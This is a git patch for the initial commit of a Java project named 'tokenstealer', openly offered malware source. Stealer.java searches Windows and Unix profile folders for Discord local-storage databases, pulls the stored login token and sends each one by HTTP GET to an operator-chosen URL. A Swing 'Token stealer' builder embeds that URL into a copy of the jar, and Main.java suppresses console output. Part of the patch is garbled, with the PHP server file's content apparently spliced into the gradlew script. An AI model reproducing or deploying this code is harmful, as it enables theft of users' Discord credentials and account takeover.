From e174326e16e056b98799b8771c5c7315839b4cee Mon Sep 17 00:00:00 2001 From: romangraef Date: Tue, 13 Feb 2018 14:46:26 +0100 Subject: Initial commit --- .gitignore | 6 + build.gradle | 41 +++++ example-server.php | 4 + gradle/wrapper/gradle-wrapper.jar | Bin 0 -> 54706 bytes gradle/wrapper/gradle-wrapper.properties | 6 + gradlew | 172 +++++++++++++++++++++ gradlew.bat | 84 ++++++++++ settings.gradle | 2 + src/main/java/META-INF/MANIFEST.MF | 3 + src/main/java/de/romjaki/tokenstealer/Main.java | 43 ++++++ .../de/romjaki/tokenstealer/builder/BuildJar.java | 43 ++++++ .../de/romjaki/tokenstealer/builder/Builder.java | 52 +++++++ .../de/romjaki/tokenstealer/builder/Config.java | 34 ++++ .../de/romjaki/tokenstealer/stealer/Stealer.java | 143 +++++++++++++++++ 14 files changed, 633 insertions(+) create mode 100644 .gitignore create mode 100644 build.gradle create mode 100644 example-server.php create mode 100644 gradle/wrapper/gradle-wrapper.jar create mode 100644 gradle/wrapper/gradle-wrapper.properties create mode 100755 gradlew create mode 100644 gradlew.bat create mode 100644 settings.gradle create mode 100644 src/main/java/META-INF/MANIFEST.MF create mode 100644 src/main/java/de/romjaki/tokenstealer/Main.java create mode 100644 src/main/java/de/romjaki/tokenstealer/builder/BuildJar.java create mode 100644 src/main/java/de/romjaki/tokenstealer/builder/Builder.java create mode 100644 src/main/java/de/romjaki/tokenstealer/builder/Config.java create mode 100644 src/main/java/de/romjaki/tokenstealer/stealer/Stealer.java diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..38fa0a8 --- /dev/null +++ b/.gitignore @@ -0,0 +1,6 @@ +out/ +.idea/ +build/ +.gradle/ +*.localstorage +tokens.txt diff --git a/build.gradle b/build.gradle new file mode 100644 index 0000000..7405842 --- /dev/null +++ b/build.gradle @@ -0,0 +1,41 @@ +buildscript { + repositories { + jcenter() + } + dependencies { + classpath 'com.github.jengelman.gradle.plugins:shadow:2.0.2' + } +} + +plugins { + id 'java' + id 'application' + id 'com.github.johnrengelman.shadow' version '2.0.2' +} + +group 'de.romjaki' +version '1.0-SNAPSHOT' + +mainClassName = "de.romjaki.tokenstealer.Main" + +manifest { + jar { + attributes 'Main-Class': mainClassName + } +} + +shadowJar { + classifier = 'shadow' +} + +sourceCompatibility = 1.8 + +repositories { + mavenCentral() +} + + +dependencies { + compile group: 'org.xerial', name: 'sqlite-jdbc', version: '+' + testCompile group: 'junit', name: 'junit', version: '4.12' +} diff --git a/example-server.php b/example-server.php new file mode 100644 index 0000000..200a70f --- /dev/null +++ b/example-server.php @@ -0,0 +1,4 @@ + \(.*\)$'` + if expr "$link" : '/.*' > /dev/null; then + PRG="$link" + else + PRG=`dirname "$PRG"`"/$link" + fi +done +SAVED="`pwd`" +cd "`dirname \"$PRG\"`/" >/dev/null +APP_HOME="`pwd -P`" +cd "$SAVED" >/dev/null + +APP_NAME="Gradle" +APP_BASE_NAME=`basename "$0"` + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS="" + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD="maximum" + +warn () { + echo "$*" +} + +die () { + echo + echo "$*" + echo + exit 1 +} + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "`uname`" in + CYGWIN* ) + cygwin=true + ;; + Darwin* ) + darwin=true + ;; + MINGW* ) + msys=true + ;; + NONSTOP* ) + nonstop=true + ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD="$JAVA_HOME/jre/sh/java" + else + JAVACMD="$JAVA_HOME/bin/java" + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD="java" + which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." +fi + +# Increase the maximum file descriptors if we can. +if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then + MAX_FD_LIMIT=`ulimit -H -n` + if [ $? -eq 0 ] ; then + if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then + MAX_FD="$MAX_FD_LIMIT" + fi + ulimit -n $MAX_FD + if [ $? -ne 0 ] ; then + warn "Could not set maximum file descriptor limit: $MAX_FD" + fi + else + warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" + fi +fi + +# For Darwin, add options to specify how the application appears in the dock +if $darwin; then + GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" +fi + +# For Cygwin, switch paths to Windows format before running java +if $cygwin ; then + APP_HOME=`cygpath --path --mixed "$APP_HOME"` + CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` + JAVACMD=`cygpath --unix "$JAVACMD"` + + # We build the pattern for arguments to be converted via cygpath + ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` + SEP="" + for dir in $ROOTDIRSRAW ; do + ROOTDIRS="$ROOTDIRS$SEP$dir" + SEP="|" + done + OURCYGPATTERN="(^($ROOTDIRS))" + # Add a user-defined pattern to the cygpath arguments + if [ "$GRADLE_CYGPATTERN" != "" ] ; then + OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" + fi + # Now convert the arguments - kludge to limit ourselves to /bin/sh + i=0 + for arg in "$@" ; do + CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` + CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option + + if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition + eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` + else + eval `echo args$i`="\"$arg\"" + fi + i=$((i+1)) + done + case $i in + (0) set -- ;; + (1) set -- "$args0" ;; + (2) set -- "$args0" "$args1" ;; + (3) set -- "$args0" "$args1" "$args2" ;; + (4) set -- "$args0" "$args1" "$args2" "$args3" ;; + (5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; + (6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; + (7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; + (8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; + (9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; + esac +fi + +# Escape application args +save () { + for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done + echo " " +} +APP_ARGS=$(save "$@") + +# Collect all arguments for the java command, following the shell quoting and substitution rules +eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" + +# by default we should be in the correct project dir, but when run from Finder on Mac, the cwd is wrong +if [ "$(uname)" = "Darwin" ] && [ "$HOME" = "$PWD" ]; then + cd "$(dirname "$0")" +fi + +exec "$JAVACMD" "$@" diff --git a/gradlew.bat b/gradlew.bat new file mode 100644 index 0000000..f955316 --- /dev/null +++ b/gradlew.bat @@ -0,0 +1,84 @@ +@if "%DEBUG%" == "" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%" == "" set DIRNAME=. +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS= + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if "%ERRORLEVEL%" == "0" goto init + +echo. +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto init + +echo. +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:init +@rem Get command-line arguments, handling Windows variants + +if not "%OS%" == "Windows_NT" goto win9xME_args + +:win9xME_args +@rem Slurp the command line arguments. +set CMD_LINE_ARGS= +set _SKIP=2 + +:win9xME_args_slurp +if "x%~1" == "x" goto execute + +set CMD_LINE_ARGS=%* + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% + +:end +@rem End local scope for the variables with windows NT shell +if "%ERRORLEVEL%"=="0" goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 +exit /b 1 + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/settings.gradle b/settings.gradle new file mode 100644 index 0000000..2304d6c --- /dev/null +++ b/settings.gradle @@ -0,0 +1,2 @@ +rootProject.name = 'tokenstealer' + diff --git a/src/main/java/META-INF/MANIFEST.MF b/src/main/java/META-INF/MANIFEST.MF new file mode 100644 index 0000000..ac9375a --- /dev/null +++ b/src/main/java/META-INF/MANIFEST.MF @@ -0,0 +1,3 @@ +Manifest-Version: 1.0 +Main-Class: de.romjaki.tokenstealer.Main + diff --git a/src/main/java/de/romjaki/tokenstealer/Main.java b/src/main/java/de/romjaki/tokenstealer/Main.java new file mode 100644 index 0000000..80e0942 --- /dev/null +++ b/src/main/java/de/romjaki/tokenstealer/Main.java @@ -0,0 +1,43 @@ +package de.romjaki.tokenstealer; + +import de.romjaki.tokenstealer.builder.Builder; +import de.romjaki.tokenstealer.builder.Config; +import de.romjaki.tokenstealer.stealer.Stealer; + +import javax.swing.*; +import java.io.OutputStream; +import java.io.PrintStream; +import java.util.Objects; + +import static javax.swing.WindowConstants.EXIT_ON_CLOSE; + +public class Main { + public static void main(String[] args) { + PrintStream nullStream = new PrintStream(new OutputStream() { + @Override + public void write(int i) { + } + }); + if (!Objects.equals(System.getenv("DEBUG_DISCORDTS"), "true")) { + System.setOut(nullStream); + System.setErr(nullStream); + } + Config.load(args); + if (Config.INSTANCE == null) { + Builder builder = new Builder(); + builder.setDefaultCloseOperation(EXIT_ON_CLOSE); + builder.setVisible(true); + } else if ( + JOptionPane.showConfirmDialog( + null, + "I'm gonna send your discord token(s) to " + + Config.INSTANCE.getRequest() + + ". Are you okay with this?", + "WARNING", + JOptionPane.OK_CANCEL_OPTION, JOptionPane.ERROR_MESSAGE + ) == JOptionPane.OK_OPTION) { + Stealer.steal(); + } + } + +} diff --git a/src/main/java/de/romjaki/tokenstealer/builder/BuildJar.java b/src/main/java/de/romjaki/tokenstealer/builder/BuildJar.java new file mode 100644 index 0000000..c6224ba --- /dev/null +++ b/src/main/java/de/romjaki/tokenstealer/builder/BuildJar.java @@ -0,0 +1,43 @@ +package de.romjaki.tokenstealer.builder; + +import java.io.File; +import java.io.IOException; +import java.net.URI; +import java.net.URISyntaxException; +import java.nio.file.*; +import java.util.HashMap; + + +public class BuildJar { + static void buildJar(String request, File target) { + if (target == null) return; + try { + Files.copy( + Paths.get(getCurrentJar()), + Paths.get(target.toURI()), + StandardCopyOption.REPLACE_EXISTING + ); + } catch (URISyntaxException | IOException e) { + e.printStackTrace(); + return; + } + URI fileUri = target.toURI(); + try (FileSystem fs = + FileSystems.newFileSystem( + new URI("jar:" + fileUri.getScheme(), fileUri.getPath(), null), + new HashMap() {{ + put("create", "false"); + }}, + null)) { + Path path = fs.getPath("/request"); + Files.write(path, request.getBytes()); + } catch (IOException | URISyntaxException e) { + e.printStackTrace(); + } + + } + + private static URI getCurrentJar() throws URISyntaxException { + return BuildJar.class.getProtectionDomain().getCodeSource().getLocation().toURI(); + } +} diff --git a/src/main/java/de/romjaki/tokenstealer/builder/Builder.java b/src/main/java/de/romjaki/tokenstealer/builder/Builder.java new file mode 100644 index 0000000..2d19e25 --- /dev/null +++ b/src/main/java/de/romjaki/tokenstealer/builder/Builder.java @@ -0,0 +1,52 @@ +package de.romjaki.tokenstealer.builder; + +import javax.swing.*; +import java.awt.*; +import java.io.File; + +public class Builder extends JFrame { + public static final String PLACEHOLDER_HINT = "Use %s as placeholder for the token"; + public static final String COPYRIGHT = "COPYRIGHT: MAINZ DAZ IS!"; + private JTextField requestField; + private JPanel requestPanel; + private JLabel requestLabel; + private JButton generateButton; + + public Builder() { + super("Token stealer"); + setLayout(new GridLayout(0, 1)); + add(generateRequestField()); + add(generateGenerateButton()); + pack(); + } + + private Component generateGenerateButton() { + generateButton = new JButton("Generate!"); + generateButton.setToolTipText(COPYRIGHT); + generateButton.addActionListener(ignored -> BuildJar.buildJar(requestField.getText(), showSaveDialog())); + return generateButton; + } + + private File showSaveDialog() { + JFileChooser chooser = new JFileChooser(); + switch (chooser.showSaveDialog(this)) { + case JFileChooser.APPROVE_OPTION: + return chooser.getSelectedFile(); + case JFileChooser.CANCEL_OPTION: + case JFileChooser.ERROR_OPTION: + default: + return null; + } + } + + private Component generateRequestField() { + requestPanel = new JPanel(new GridLayout()); + requestLabel = new JLabel("Request url:"); + requestLabel.setToolTipText(PLACEHOLDER_HINT); + requestField = new JTextField(40); + requestField.setToolTipText(PLACEHOLDER_HINT); + requestPanel.add(requestLabel); + requestPanel.add(requestField); + return requestPanel; + } +} diff --git a/src/main/java/de/romjaki/tokenstealer/builder/Config.java b/src/main/java/de/romjaki/tokenstealer/builder/Config.java new file mode 100644 index 0000000..ea547f7 --- /dev/null +++ b/src/main/java/de/romjaki/tokenstealer/builder/Config.java @@ -0,0 +1,34 @@ +package de.romjaki.tokenstealer.builder; + +import java.util.Scanner; + +public class Config { + + public static Config INSTANCE; + + private String request; + + public Config(String request) { + this.request = request; + } + + private static Config getConfig() { + try (Scanner scanner = new Scanner(Config.class.getResourceAsStream("/request")) + .useDelimiter("\\A")) { + return new Config(scanner.next()); + } catch (NullPointerException e) { + return null; + } + } + + public static Config load(String[] args) { + if (args.length == 2 && args[0].equals("--url")) { + return INSTANCE = new Config(args[1]); + } + return INSTANCE = getConfig(); + } + + public String getRequest() { + return request; + } +} diff --git a/src/main/java/de/romjaki/tokenstealer/stealer/Stealer.java b/src/main/java/de/romjaki/tokenstealer/stealer/Stealer.java new file mode 100644 index 0000000..d595ccd --- /dev/null +++ b/src/main/java/de/romjaki/tokenstealer/stealer/Stealer.java @@ -0,0 +1,143 @@ +package de.romjaki.tokenstealer.stealer; + +import de.romjaki.tokenstealer.builder.Config; + +import java.io.File; +import java.io.IOException; +import java.net.HttpURLConnection; +import java.net.URL; +import java.nio.file.*; +import java.nio.file.attribute.BasicFileAttributes; +import java.sql.*; +import java.util.ArrayList; +import java.util.Collections; +import java.util.List; +import java.util.stream.Stream; + +public class Stealer { + private static final String UNIX_LOCALSTORAGE = "glob:" + System.getenv("HOME") + "/.config/discord*/Local Storage/*discordapp*_0.localstorage"; + private static final String WINDOWS_LOCALSTORAGE = "glob:" + System.getenv("APPDATA") + "\\discord*\\Local Storage\\*discordapp*_0.localstorage"; + + public static void steal() { + try { + Class.forName("org.sqlite.JDBC"); + } catch (ClassNotFoundException e) { + e.printStackTrace(); + return; + } + getDiscordLocations() + .stream() + .peek(System.out::println) + .map(Stealer::copy) + .map(Path::toFile) + .map(Stealer::sqliteConnect) + .flatMap(Stealer::getToken) + .forEach(Stealer::sendToken); + } + + private static Path copy(Path from) { + try { + Path to = Files.createTempFile(from.getParent(), "backup-", ".localstorage"); + Files.copy(from, to, StandardCopyOption.REPLACE_EXISTING); + return to; + } catch (IOException e) { + e.printStackTrace(); + } + return from; + } + + private static Connection sqliteConnect(File file) { + try { + return DriverManager.getConnection("jdbc:sqlite:" + file.getCanonicalPath()); + } catch (SQLException | IOException e) { + e.printStackTrace(); + } + return null; + } + + private static void sendToken(String token) { + System.out.println("Found token: " + token); + try { + HttpURLConnection conn = (HttpURLConnection) + new URL(String.format(Config.INSTANCE.getRequest(), token)) + .openConnection(); + conn.setRequestMethod("GET"); + conn.getInputStream().read(); + } catch (IOException e) { + e.printStackTrace(); + } + } + + private static Stream getToken(Connection connection) { + try { + Statement stmt = connection.createStatement(); + ResultSet result = stmt.executeQuery("SELECT key, value FROM ItemTable WHERE key='token'"); + Stream.Builder builder = Stream.builder(); + while (result.next()) { + byte[] blob = result.getBytes("value"); + byte[] buffer = new byte[blob.length / 2]; + int i = -1; + while (++i < buffer.length) + buffer[i] = blob[i * 2]; + builder.add(new String(buffer).replace("\"", "")); + } + return builder.build(); + } catch (SQLException e) { + e.printStackTrace(); + } + return Stream.of(); + } + + + private static List getDiscordLocations() { + List matches = new ArrayList<>(); + matches.addAll(getUnixDiscordLocations()); + matches.addAll(getWindowsDiscordLocations()); + return matches; + } + + private static List globRecurse(String glob, String start) { + try { + return globRecurse(glob, Paths.get(start)); + } catch (Exception e) { + return Collections.emptyList(); + } + } + + private static List globRecurse(String glob, Path path) { + List matches = new ArrayList<>(); + try { + PathMatcher unixMatcher = FileSystems.getDefault() + .getPathMatcher(glob); + Files.walkFileTree(path, new SimpleFileVisitor() { + @Override + public FileVisitResult visitFile(Path file, BasicFileAttributes attrs) { + System.out.print(file); + if (unixMatcher.matches(file)) { + System.out.println("[FOUND]"); + matches.add(file); + } else { + System.out.println("[NOT FOUND]"); + } + return FileVisitResult.CONTINUE; + } + + @Override + public FileVisitResult visitFileFailed(Path file, IOException exc) { + return FileVisitResult.CONTINUE; + } + }); + } catch (Exception e) { + e.printStackTrace(); + } + return matches; + } + + private static List getWindowsDiscordLocations() { + return globRecurse(WINDOWS_LOCALSTORAGE, System.getenv("APPDATA")); + } + + private static List getUnixDiscordLocations() { + return globRecurse(UNIX_LOCALSTORAGE, System.getenv("HOME") + "/.config"); + } +} -- cgit